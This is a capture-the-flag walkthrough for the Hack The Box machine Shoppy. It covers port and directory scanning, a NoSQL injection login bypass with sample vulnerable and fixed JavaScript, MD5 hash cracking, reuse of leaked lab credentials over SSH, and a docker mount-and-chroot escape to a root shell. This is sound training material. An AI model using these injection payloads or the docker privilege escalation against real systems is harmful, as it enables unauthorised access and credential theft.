Reconnaissance
```sh
nmap -sV -sC <target-ip>
```
Results
```
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 21:13 EST
Nmap scan report for 10.10.11.180
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds
```
Only two ports are open: SSH (OpenSSH 8.4p1) and nginx on 80. There is not much here except the redirect to http://shoppy.htb, and that is the useful part: the site is served by hostname, so add shoppy.htb to /etc/hosts before going any further.
Directory bruteforcing
```sh
gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
```
Results:
```
┌──(root㉿kali)-[~/machines/shoppy-HTB]
└─# gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb
[+] Method:                  GET
[+] Threads:                 500
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,301
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/16 00:46:53 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 28] [--> /login]
/login                (Status: 200) [Size: 1074]
/Login                (Status: 200) [Size: 1074]
Progress: 3984 / 220561 (1.81%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/16 00:46:58 Finished
===============================================================
```
We have a login page and an admin page (which just redirects to /login) on shoppy.htb.
Let's try injecting into the login form. Note that the payload is JavaScript (`||`, `==`) rather than SQL, so what we are really exploiting is a NoSQL injection against a query the backend evaluates as JavaScript:

```
username : admin'||'1==1
password : random
```

Boom!! We are logged in as admin.
The same payload works again inside the admin panel:
<img width="520" alt="sqli-after-admin" src="https://user-images.githubusercontent.com/95465072/208038413-8b3e3f82-e8f5-4f4f-b8d5-9a3264871104.png">
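Why `admin'||'1==1` logs us in, as an added example that is not the Shoppy application's own code: the backend shape below (a MongoDB `$where` string assembled from the form fields and evaluated as JavaScript) is an assumption that fits the payload, and the user documents are constructed for the demo. The fixed version shows the usual remedy, an equality query built from values rather than from a string the user controls.

```javascript
// Added example, not code from the write-up or the target application.
// Assumption: the login builds a MongoDB $where string from user input.
// Sample users are constructed; the "password" fields stand in for hashes.
const users = [
  { username: 'admin', password: 'adminpass-hash' },
  { username: 'josh', password: 'joshpass-hash' },
];

// Stand-in for MongoDB's $where: the server evaluates the string as JavaScript
// with `this` bound to each document and returns the first document that matches.
function whereQuery(docs, whereStr) {
  const predicate = new Function('return (' + whereStr + ');');
  return docs.find((doc) => predicate.call(doc)) || null;
}

// The string the vulnerable code sends to the database.
function buildWhere(username, password) {
  return `this.username === '${username}' && this.password === '${password}'`;
}

// VULNERABLE: input is spliced straight into the query string.
// With username = admin'||'1==1 the string becomes
//   this.username === 'admin'||'1==1' && this.password === 'random'
// and because || binds weaker than && it parses as
//   (this.username === 'admin') || ('1==1' && this.password === 'random')
// which is true for the admin document whatever the password is.
function loginVulnerable(username, password) {
  return whereQuery(users, buildWhere(username, password));
}

// FIXED: compare values, never evaluate user input as code. Rejecting
// non-string input also blocks the {"$ne": null} style of operator injection
// that JSON bodies allow.
function loginFixed(username, password) {
  if (typeof username !== 'string' || typeof password !== 'string') return null;
  return users.find((u) => u.username === username && u.password === password) || null;
}

console.log(buildWhere("admin'||'1==1", 'random'));
console.log('vulnerable:', loginVulnerable("admin'||'1==1", 'random'));
console.log('fixed:', loginFixed("admin'||'1==1", 'random'));
```

The same bypass works for any other known username in place of `admin`, which is why the payload can be reused later in the admin panel to pull other users' records.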
Download the transcript!
Great! We got the password hash of user **josh**.
<img width="461" alt="pass-user-afteradmin-download" src="https://user-images.githubusercontent.com/95465072/208038531-1e1741e0-9ce4-438d-9de1-db802d67c5e6.png">
The hash is 32 hex characters, i.e. unsalted MD5, so it is worth a lookup before any real cracking: [crack this hash here](https://crackstation.net/)
<img width="786" alt="hash-for-josh" src="https://user-images.githubusercontent.com/95465072/208038459-27930a24-ad73-43b6-ae02-44f679fefe1e.png">
| hash (MD5) | password |
|--|--|
| 6ebcea65320589ca4f2f1ce039975995| remembermethisway |
## Subdomain Enumeration
```sh
gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
```
Results:
```
┌──(root㉿kali)-[/usr/share/wordlists/SecLists]
└─# gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://shoppy.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.3
[+] Timeout:         10s
[+] Append Domain:   false
===============================================================
2022/12/16 01:08:10 Starting gobuster in VHOST enumeration mode
===============================================================
mattermost (Status: 200) [Size: 1074]
```
We get the subdomain http://mattermost.shoppy.htb; add it to /etc/hosts as well. (Append Domain is false in this run, so gobuster sent the bare word as the Host header; on gobuster 3.2 and later pass --append-domain to have it send Host: word.shoppy.htb.)
Log in to Mattermost as josh with the password we just cracked:
username josh, password remembermethisway
Boom! In the messages we find:
```
jaeger
4:22 AM
Hey @josh,
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.
```
Based on this message we can try the same credentials over SSH (password reuse between the app and the box):
```sh
ssh jaeger@shoppy.htb
password : Sh0ppyBest@pp!
```
Got the user flag!!
```
jaeger@shoppy:~$ ls
Desktop    Music     ShoppyApp        user.txt
Documents  Pictures  shoppy_start.sh  Videos
Downloads  Public    Templates
jaeger@shoppy:~$ cat user.txt
3056a9074c4c2bd189e9************
jaeger@shoppy:~$
```
Privilege Escalation
```sh
sudo -l
```
This shows that we can execute /home/deploy/password-manager as the deploy user (not as root, hence the `-u deploy` below):
```sh
cat /home/deploy/password-manager
sudo -u deploy /home/deploy/password-manager
```
Running the password manager as deploy gives us deploy's password, which also works over SSH:
```sh
ssh deploy@shoppy.htb
password : Deploying@pp!
```
We are not inside a container; rather, the deploy user can talk to the Docker daemon (the command below needs no sudo). Anyone who can start a container can mount the host's root filesystem into it, and since the container process runs as root, chroot-ing into that mount gives a root shell on the host itself. This is the docker entry on GTFOBins (the sudo variant is the same command prefixed with sudo):
gtfobins → docker → shell
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
This needs an image that is already present locally if the box has no outbound internet; check `docker images` and substitute whatever is listed if alpine is not there. Once inside, `/mnt` is the host root, so the root flag and /etc/shadow are readable directly.